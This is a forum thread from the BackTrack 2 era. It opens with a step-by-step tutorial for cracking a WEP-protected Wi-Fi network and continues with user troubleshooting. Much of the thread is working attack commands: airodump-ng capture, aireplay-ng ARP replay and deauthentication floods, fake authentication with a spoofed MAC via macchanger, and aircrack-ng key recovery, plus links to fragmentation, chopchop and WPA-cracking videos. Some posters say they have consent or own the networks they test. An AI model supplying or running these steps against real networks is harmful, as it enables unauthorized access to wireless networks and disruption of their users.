OK. IM A TOTAL NEWBIE TO LINUX AND SECURITY TESTING. I HAVE SEARCHED THIS FORUM AND HAVE YET TO FIND SIMPLE INSTRUCTIONS ON HOW TO CRACK WEP. SO, THIS IS FOR THE NEWBIES OUT THERE THAT ARE JUST LIKE ME. I USED BT 2 FINAL AND DID THIS CRACK ON A FRIENDS AP, WITH HIS CONSENT. I HAD NO PRIOR KNOWLEDGE ABOUT HIS AP OR WHETHER HIS WEP WAS 64 OR 128 BIT. HERE GOES:

OPEN UP KISMET AND FIND THE AP YOU WISH TO CRACK. HIT "S" AND THEN "C". THIS WILL SORT THE APs BY CHANNEL. USE THE ARROW KEY TO HIGHLIGHT THE AP YOU WISH TO CRACK. HIT ENTER. WRITE DOWN THE SSID, THE BSSID, AND THE CHANNEL. ALSO MAKE SURE IT HAS CLIENTS CONNECTED TO IT OTHERWISE ITS GOING TO BE NEXT TO IMPOSSIBLE TO OBTAIN ENOUGH IVS TO DO THE CRACK.

GO TO THE COMMAND SCREEN (CLICK THE SECOND ICON FROM THE LEFT ON THE BOTTOM LEFT SIDE OF THE SCREEN)

TYPE AIRODUMP-NG -W CAPTURE -C CHANNELNUMBER DEVICE
THE DEVICE WILL BE THE NAME OF YOUR WIRELESS CARD. YOU SHOULD SEE THE NAME ON THE COMMAND SCREEN THAT CAME UP WHEN YOU OPENED KISMET. MINE IS RA0. THE CHANNELNUMBER IS THE NUMBER OF THE CHANNEL THE AP IS ON. HIT ENTER.

ON THE SCREEN NOW YOU SHOULD SEE THE MAC ADDRESS OF THE AP YOU ARE CRACKING. SEVERAL LINES BELOW IT YOU SHOULD SEE AT LEAST 2 MAC ADDRESSES. ONE WILL BE THE AP AND THE OTHER WILL BE THE CLIENT. WRITE DOWN THE CLIENT MAC ADDRESS.

GO TO THE COMMAND SCREEN AGAIN AND TYPE AIREPLAY-NG --ARPREPLAY -B MACADDRESSOFAP -H MACADDRESSOFCLIENT DEVICE. HIT ENTER.

GO TO THE COMMAND SCREEN AGAIN AND TYPE AIREPLAY-NG -E SSIDOFNETWORK -A MACADDRESSOFAP -C MACADDRESSOFCLIENT --DEAUTH 10 DEVICE. HIT ENTER.

IF YOU LOOK ON THE AIRODUMP SCREEN YOU SHOULD SEE THE DATA NUMBERS RISING AT A FAST RATE. MAKE SURE THAT ON THE AIRPLAY SCREEN (THE COMMAND YOU EXCUTED BEFORE THE DEAUTH) AND MAKE SURE THAT AN ARP REQUEST WAS CAPTURED AND IS NOW BEING RESENT. IF IT IS THEN YOU SHOULD HAVE THE KEY IN NO TIME. LET IT RUN FOR ABOUT 5-10 MINS. YOU CAN CLOSE THE DEAUTH SCREEN.

GO TO THE COMMAND SCREEN AND TYPE: AIRCRACK-NG -F 4 MACADDRESSOFAP -N 64 CAPTURE-01.CAP
HIT ENTER. 64 IS FOR 64 BIT AND 128 AND FOR 128 BIT. IF YOU RUN THE CRACK ON 64 AND IT DOES NOT WORK AFTER A FEW TIMES THEN TRY THE 128. THE ONE I CRACKED ENDED UP BEING 128 AND TOOK ABOUT 35 MINS TO CRACK WITH ABOUT 1.2 MILLION IVS. ONE IMPORTANT NOTE ABOUT THE CAPTURE-01.CAP FILE: ON MINE, EVEN THOUGH I NAMED IT CAPTURE, IT NAMED IT CAPTURE-01. BE SURE TO CHECK UNDER EDITOR/KWRITE TO MAKE SURE OF THE EXACT NAME OF THE FILE. IT SHOULD BE THE ONLY CAP FILE IN THERE. JUST GO TO KWRITE AND GO TO OPEN. YOU SHOULD SEE YOUR FILE IN THERE. THIS HELD ME UP FOR QUITE SOME TIME TIL I SCREWED AROUND WITH IT.

ALSO THE -F CAN BE RAISED OR LOWERED. A HIGHER NUMBER WILL TAKE LONGER AND A LOWER NUMBER WILL BE FASTER, BUT MAY NOT FIND THE KEY. I STICK WITH 4.
HOPE THIS HELPS YOU NEWBIES.

Wow that's a lot of YELLING.

Agreed, bunch of yellow and i hate reading shit in caps. Anyways props for the tut but there are at least 4 of them out there.

Why go thru all that typing of commands? With airoscript you just press 1, 2, 3, or 4 to run those commands.

sorry bout the caps guys...yeah, i have seen the other tuts on WEP cracking but most use older versions of BT and were not applicable to complete newbies...not to familar with using airoscrpit, I just prefer to type the commands out, although I will make an attempt to learn to use airoscript.

Sorry for burning you on the caps....please know that the contribution back to the community is appreciated even if we bust yer chops for YELLING ;)

How long should I leave aircrack working and how do I know the encryption type is 64 or 128??

How would i identify that aircrack is not working with a particular encryption type like example 64?

By the way GREAT TUT! just wish there was a video where we could watch how to crack WEP using BACK TRACK 2 FINAL.

How long should I leave aircrack working and how do I know the encryption type is 64 or 128??

How would i identify that aircrack is not working with a particular encryption type like example 64?

By the way GREAT TUT! just wish there was a video where we could watch how to crack WEP using BACK TRACK 2 FINAL.
How long you leave aircrack running depends on how many ivs you have. I have only cracked a 128 bit key and it took about 30-45 mins with 1.2million ivs. I believe the number for 64 bit is around 250,000-500,000. When I tried with 64 bit it ran for about 10 mins and then told me it couldnt find the key so I changed the f factor from 4 to 10 and it took a bit longer but still told me it couldnt find it. I then ran aircrack for 128 bit and it ran for quite some time before it found the key. I left aireplay running while aircrack was running also, that way it kept the ivs rising.

One more thing you should try is using -i 1, chances are its the first Hex Key it will save you a lot of time if it is. In a few cases I have cracked 64bit keys with 100,000 ivs is less then a minute.

ok whenever i try to do a arreplay attack it say the specified mac did not match the other mac or something like that and it says 0 for sent and 0 ARP requests, any ideas? OH and BTW the PWR under airodump always shows -1, even though i own RKJ and its just upstairs in my house. My wireless card is inbuilt in an IBM thinkpad intel centrino mobile technology. Heres a picture:

Removed by me

PLEASE help me out !!

Thanks

are you locked onto one channel? as far as the error message is concerned, I always get the same message, but it never causes any problems for me. I couldnt see the screen shot too well, but it looked like there was only one protected network, at it was WPA-PSK. Make sure the client Mac addresss that you are using is listed in airodump. I have gone off the client mac address from kismet and it is not always accurate for some reason.

Ok, so I have mastered, or so I think, the art of cracking the WEP key on APs with broadcasted SSIDs and assigned channel numbers (as they appear in Kismet). What about APs without ssids or channel numbers. I know for a fact that a client is connected to the network, but it is setup not to broadcast the ssid and no channel number is listed. any suggestions.

ITssid:
From the pic you posted it doesn't even look like you have WEP enabled on the AP your trying to attack. Also your ARP attack is set to AP 00:14:BF:CD:A5:32 and you card is associated to AP 00:13:46:F8:E0:19

tybalt:
default is not my target then why should i enter the bssid of default arent i amsuppose to enter the bssid and mac client i am trying to crack, and Not the default i am associated with??

please help this is very confusing.

In your screenshot I am missing a deauthentication..

.. and having too much of MAC information. Blur those MACs when posting publicly unless they're fake, just in case.

Do i have to use the mac of the ap i am associated with?

Which wireless card do u recomend to use bk2 to crack wep? im about to buy the netgear wg511u....

Which wireless card do u recomend to use bk2 to crack wep? im about to buy the netgear wg511u....

erm...depends on PC or laptop, and which connection (usb, pci......)

erm...depends on PC or laptop, and which connection (usb, pci......)


What is the recommended card for desktop ?

Thanks for the tut. but i'm having a problem.
When i try this>> GO TO THE COMMAND SCREEN AND TYPE: AIRCRACK-NG -F 4 MACADDRESSOFAP -N 64 CAPTURE-01.CAP <<
I get 'No directory or file' error.
I'm in the /root directory and i can see 'capture-01.cap' listed when
i do ls-n
Is this becuase im using the live-cd nd not a HD install?

Thanks for the tut. but i'm having a problem.
When i try this>> GO TO THE COMMAND SCREEN AND TYPE: AIRCRACK-NG -F 4 MACADDRESSOFAP -N 64 CAPTURE-01.CAP <<
I get 'No directory or file' error.
I'm in the /root directory and i can see 'capture-01.cap' listed when
i do ls-n
Is this becuase im using the live-cd nd not a HD install?

Are you using all caps like that, or are you using the proper capitalisation, as it does make a huge difference.

Yes i'm using correct syntax--no caps, i just did copy and paste for the reply

Just run:

aircrack-ng capture*.cap

What version of aircrack-ng are you using?

AHA! I new there was a way using wild cards '*'
Thanks..
Version?-- don't know i'll have to check when i get home.
Using the version that comes with BT2--just installed to HD last night
haven't updated anything yet.

when i do an airreplay attack the speed of collect data didn't go up,

is the mac of client after -h and -c are the same

it had ask to use airodum to capture the replies, what do i need to do to capture the replies

and when i do the airreplay attack the packet and sent packet all go up but the got arp stay at 1 or 2

wepcrack, i think you are missing some fundamental information concerning the use of the Aircrack Suite. I suggest you go to the Aircrack site and read the information that is available.

You would be best to look in the tutorials and guides section of this forum where you will find videos explaining how to, even the Aircrack site uses them.

Hello everyone.
First of all, i 'd like to say that i'm new to this Forum. Thanks in advance for any help received.
Here is my issue:
I have a Toshiba laptop, and just bought a Proxim 8470-wd card which has an Atheros chipset i believe.
Now, after putting the card on Monitor mode with "airmon-ng start wifi0"
I manage to launch the Airodump command on the specified channel of my wireless network (ch. 1).
Then, i start the Aireplay fake authentication using either my real MAC or a fake one. It should not make a difference, as i disabled MAC filtering. I receive an authentication successful.
However, after launching the Aireplay attack -3 using the ESSID, the AP MAC, and the fake or the real MAC on the ATH1 (which is the interface listening in monitor mode), the IVS count does not increase in particular number.It basically increases at the normal rate. It also does not receive any ARP replies, and therefore does not send any.
Now, as this is my network and no other clients attached to it, i wonder what i'm doing wrong?
On my network i'm using WEP Encryption and Open Authentication, just to let you picture the scenario.
Please help, as i can't get IVS to increase in any way!
Thanks in advance.

Too many questions in one thread.

Hello everyone.
First of all, i 'd like to say that i'm new to this Forum. Thanks in advance for any help received.
Here is my issue:
I have a Toshiba laptop, and just bought a Proxim 8470-wd card which has an Atheros chipset i believe.
Now, after putting the card on Monitor mode with "airmon-ng start wifi0"
I manage to launch the Airodump command on the specified channel of my wireless network (ch. 1).
Then, i start the Aireplay fake authentication using either my real MAC or a fake one. It should not make a difference, as i disabled MAC filtering. I receive an authentication successful.
However, after launching the Aireplay attack -3 using the ESSID, the AP MAC, and the fake or the real MAC on the ATH1 (which is the interface listening in monitor mode), the IVS count does not increase in particular number.It basically increases at the normal rate. It also does not receive any ARP replies, and therefore does not send any.
Now, as this is my network and no other clients attached to it, i wonder what i'm doing wrong?
On my network i'm using WEP Encryption and Open Authentication, just to let you picture the scenario.
Please help, as i can't get IVS to increase in any way!
Thanks in advance.

Normally I would tell you to use the search function because this topic has been exhausted to a absurd level but lucky for you you caught me in a good mood. With the -3 attack somtimes you must wait a long time to capture a arp request. up to a hour. You should be able to see in the aireplay window when I is captured. Your other option is to use the two other attacks which are the -5 and -4 options in aireplay. There are easy to follow videos and tuts all over this site and the aircrack site. So there you go still requires searching but I hope that helps:)

Thanks for your prompt reply. I very much appreciate it!
I actually read a lot in various forums,and watched endless number of tutorials (i guess i'm dumb! lol). however, still haven't managed to get through this stage.
After upgrading to aircrack 1.0 i now somehow managed to increase the number of IVS packet to over 500.000, which for my WEP Key (40 Bytes) should be enough, right?
I then tried aircrack-ng with various options like increasing the fudge factor, the Korek options, etc... using the output.cap file without luck.
I also notice the output.cap file only shows 8 IVS in it. Why is it not increasing?
Here are the commands i run:
1: airodump-ng --ivs -c 1 -w out ath1
2: aireplay-ng -1 0 -e ESSID -b MAC of AP -h MAC of authorised client ath1<<<got association!
3: aireplay-ng -3 -e ESSID -b MAC of AP -h MAC of authorised client ath1 <<< it shows arp replies increasing to more than 500.000.
I then confirm on the airodump window the number of packets collected is increasing rapidly.
4: aircrack-ng -a 1 -e ESSID -b MAC of AP replay_arp output file .cap <<< but only shows reading 8 IVS.
Hope someone can shed light on this issue.
Thanks for your patience.
alexsys

your not opening the right file

your file is an .ivs file not a .cap file (because of --ivs switch)

search something called xxxxxx.ivs

cd to the dir those files are

and try aircrack-ng on this file........

your not opening the right file

your file is an .ivs file not a .cap file (because of --ivs switch)

search something called xxxxxx.ivs

cd to the dir those files are

and try aircrack-ng on this file........


Hi Shamanvirtuel, and thanks for your interest in my issue.
I tried to use aircrack-ng with the .ivs file as well, which contains more than 500.000 ivs collected over a period of 3 hours, but it fails consistently.
Now, reading from other posts, i'm aware of the fact that for a 40 bit Key, it should take no longer than 5 mins. and no more than 300.000. However at 600.000 ivs, it still fails and keeps retrying every 5.000 ivs. I also tried changing the option -n to 128 ( although i know my WEP key is definitely 64), and the various Korek options, but still no luck.My Wep Key is a 10 digit Alpha-numeric value.
Thanks in advance.

You would be best to look in the tutorials and guides section of this forum where you will find videos explaining how to, even the Aircrack site uses them.


Yep. Even the aircrack guys liked them and got my permission to use them ....

http://aircrack-ng.org/doku.php?id=videos


Fragmentation attack (http://videos.aircrack-ng.org/frag-attack-atheros.swf)
Fragmentation attack with airoscript [low quality BUT explained (youtube) (http://www.youtube.com/watch?v=bQcLMDb-oug)]
Fragmentation attack with airoscript [ high quality AND explanation (stage 6) (http://stage6.divx.com/user/viperwalt/video/1387515/Fragmentation-Attack-With-Airoscript-%28LQ,-explained%29)] – best bet
Fragmentation attack with airoscript [ super high quality BUT NO explanation (stage 6) (http://stage6.divx.com/user/viperwalt/video/1387341/Fragmentation-Attack-Using-Airoscript)]
Fragmentation attack with airoscript (http://videos.aircrack-ng.org/FragmentationAttack/)
WEP cracking with airoscript (http://videos.aircrack-ng.org/WEP_Cracking_with_Airoscript.avi)
Injection with IPW2200 (http://videos.aircrack-ng.org/injection_ipw2200.swf) (with wifislax)
How to crack WEP with no client (http://video.aircrack-ng.org/noclient/)
Chopchop without clients using IPW2200 (http://mirror-wifislax.lost-away.org/videos/chopchopipw2.htm)
security-freak.net aircrack-ng usage (http://security-freak.net/tools/amit/airodump-ng/airodump-ng.html)
Volume #1 "E-Z No Client WEP Cracking Tutorial (http://forums.remote-exploit.org/showthread.php?t=9063)
Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial (http://forums.remote-exploit.org/showthread.php?t=7872)
Volume #3 "E-Z WPA/WPA2 Cracking Tutorial (http://forums.remote-exploit.org/showthread.php?t=8230)
Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases Tutorial (http://forums.remote-exploit.org/showthread.php?t=8041)



Ego went up another notch. Is that possible for me?? :confused::D:p:cool:

Wep Key is a 10 digit Alpha-numeric value.
Thanks in advance.


It doesn't matter that you made it Alpha-numeric. In the WEP Cracking process ..it's all converted into hexadecimal. (all numbers) ;)

Have you upgraded your version of aircrack to the latest version..or a developmental version?? :confused::confused:

It doesn't matter that you made it Alpha-numeric. In the WEP Cracking process ..it's all converted into hexadecimal. (all numbers) ;)

Have you upgraded your version of aircrack to the latest version..or a developmental version?? :confused::confused:

Hello again.
Yes, i upgraded the aircrack-ng suite to Aircrack-ng 1.0 beta1 r809. Is this version ok?
Thanks for the links you guys posted,i watched them again.Although i pretty much watched over and over again most of the ones concerning WEP.
I now managed to get the WEP key of my network (inletters and numbers!!!), but only after i connected my other laptop to the network.....as soon as it connected, my ARP replies started increasing massively.
So far, even following the tutorial on "how to crack WEP with no clients" that you posted, line by line, i could not get the ARP replies to increase. I only got them after connecting to the network with another laptop. Weird, isn't it?!!!
Here are the commands i used:
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng -w out --bssid xx:xx:xx:xx:xx -c 1 ath0
aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 ath0
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 ath0 <<also with -x 1000 option
aircrack-ng -n 64 -b xx:xx:xx:xx:xx:xx out-01.cap
There must be something i'm missing that was not in the tutorial.........???
As soon as i'll manage to get the "no clients" attack working on my network, i'll switch my router to WPA and try to crack that ( although i heard that with a combination of Alphanumerical and special chars of 21 chars is virtually impossibile?). But i still have not managed to install the wpa_supplicant file on my BT2.....i'll have to work on that a bit harder i guess!
Meanwhile i hope somebody can shed light on what's missing in my attack commands previously described,
I would like to thank the Moderators and the other Senior Members that have helped me so far.I truly appreciated it.

Hello again.
Yes, i upgraded the aircrack-ng suite to Aircrack-ng 1.0 beta1 r809. Is this version ok?
Thanks for the links you guys posted,i watched them again.Although i pretty much watched over and over again most of the ones concerning WEP.
I now managed to get the WEP key of my network (inletters and numbers!!!), but only after i connected my other laptop to the network.....as soon as it connected, my ARP replies started increasing massively.
So far, even following the tutorial on "how to crack WEP with no clients" that you posted, line by line, i could not get the ARP replies to increase. I only got them after connecting to the network with another laptop. Weird, isn't it?!!!
Here are the commands i used:
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng -w out --bssid xx:xx:xx:xx:xx -c 1 ath0
aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 ath0
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 ath0 <<also with -x 1000 option
aircrack-ng -n 64 -b xx:xx:xx:xx:xx:xx out-01.cap
There must be something i'm missing that was not in the tutorial.........???
As soon as i'll manage to get the "no clients" attack working on my network, i'll switch my router to WPA and try to crack that ( although i heard that with a combination of Alphanumerical and special chars of 21 chars is virtually impossibile?). But i still have not managed to install the wpa_supplicant file on my BT2.....i'll have to work on that a bit harder i guess!
Meanwhile i hope somebody can shed light on what's missing in my attack commands previously described,
I would like to thank the Moderators and the other Senior Members that have helped me so far.I truly appreciated it.


Sincerity is ALWAYS welcomed here. ;)

Your commands are PERFECT...except you need to leave off the -n option since its not 64 bit WEP...or use -n 128 .

The only explanation is that your AP isn't spitting out an ARP (Address Resolution Protocol) request fast enough for you. Be patient. With the commands you posted...SURELY it will respond in time. It depends on how lucky you are with your timing if no clients are connected. It can take seconds up to 30 minutes and rarely (but this does happen) hours!!! So jut be patient..and if your not..I got a video on the -4 korek chopchop attack video that may help as well. ;)

Try other attacks...-5...-4...-2

Do they work? ;)

Not all AP's respond the same way. Some hate the -3 attack...while others love it to death. ;)

Have fun...don't be impatient. You MUST be like a sniper in this business. Guess what snipers are??

Thats right...

Their PATIENT. <wink smiley here>



BTW..I have 3 or 4 tutorials concerning wpa_supplicant. They WILL get you online. Do a "search" using the keywords wpa_supplicant..or E-Z connect...and you'll find my tutorials on every encryption for WPA / WPA2 MINUS RADIUS Server.

Sincerity is ALWAYS welcomed here. ;)

Your commands are PERFECT...except you need to leave off the -n option since its not 64 bit WEP...or use -n 128 .

The only explanation is that your AP isn't spitting out an ARP (Address Resolution Protocol) request fast enough for you. Be patient. With the commands you posted...SURELY it will respond in time. It depends on how lucky you are with your timing if no clients are connected. It can take seconds up to 30 minutes and rarely (but this does happen) hours!!! So jut be patient..and if your not..I got a video on the -4 korek chopchop attack video that may help as well. ;)

Try other attacks...-5...-4...-2

Do they work? ;)

Not all AP's respond the same way. Some hate the -3 attack...while others love it to death. ;)

Have fun...don't be impatient. You MUST be like a sniper in this business. Guess what snipers are??

Thats right...

Their PATIENT. <wink smiley here>



BTW..I have 3 or 4 tutorials concerning wpa_supplicant. They WILL get you online. Do a "search" using the keywords wpa_supplicant..or E-Z connect...and you'll find my tutorials on every encryption for WPA / WPA2 MINUS RADIUS Server.

Thanks Exploitz, i'll certainly try your tutorials on wpa!
By the way, the only reason i specified the -n 64 in the aircrack-ng command is because, being the key i myself set up i know it is a 40bit key.
Hopefully i'll get the wpa_supplicant file working on BT2, as i've always been a Windows "slave", and only recently met Linux and Unix.....
Glad to know there are people willing to help out when you need it. Hopefully i'll be able to contribute to the Forum in the future!

Your welcome!! :)

Please let me know in this thread if you need further assistance..and post any questions concerning my wpa_supplicant tutorials in THAT thread. ;)

Your welcome!! :)

Please let me know in this thread if you need further assistance..and post any questions concerning my wpa_supplicant tutorials in THAT thread. ;)

Xploitz,
I have had all my questions answered !!! Quite impressed, i have to say.
I also managed to install and configure my wpa_supplicant file (thanks to your tutorial), and now i'm up and running with WPA on my network....
Now i can move on to the other features on BT2. I'll post my questions on the appropriate Threads in the future.
You guys are just great!
Thanks again for all your support and time so far. :)

Xploitz,
I have had all my questions answered !!! Quite impressed, i have to say.
I also managed to install and configure my wpa_supplicant file (thanks to your tutorial), and now i'm up and running with WPA on my network....
Now i can move on to the other features on BT2. I'll post my questions on the appropriate Threads in the future.
You guys are just great!
Thanks again for all your support and time so far. :)

Again, you are most welcome. :)

We aim to impress...and keep it that way. ;)

Thanks for share that.

ON THE SCREEN NOW YOU SHOULD SEE THE MAC ADDRESS OF THE AP YOU ARE CRACKING. SEVERAL LINES BELOW IT YOU SHOULD SEE AT LEAST 2 MAC ADDRESSES. ONE WILL BE THE AP AND THE OTHER WILL BE THE CLIENT. WRITE DOWN THE CLIENT MAC ADDRESS.

Cant you just get the Client MAC from kismet by going into the AP you want and pressing c ? because it don't always show up where you said.

Also, when using aircrack-ng -f 4 00:A1:22:C3:44:E5 -n 64 capture-01.cap it says:

Opening 00:A1:22:C3:44:E5
open failed: No such file or directory.

Whats up with that?

Cant you just get the Client MAC from kismet by going into the AP you want and pressing c ? because it don't always show up where you said.

Also, when using aircrack-ng -f 4 -h 00:A1:22:C3:44:E5 -n 64 capture-01.cap it says:

Opening 00:A1:22:C3:44:E5
open failed: No such file or directory.

Whats up with that?

i think thats the correct letter to use but you were missing it

i think thats the correct letter to use but you were missing it

What was I missing? :confused: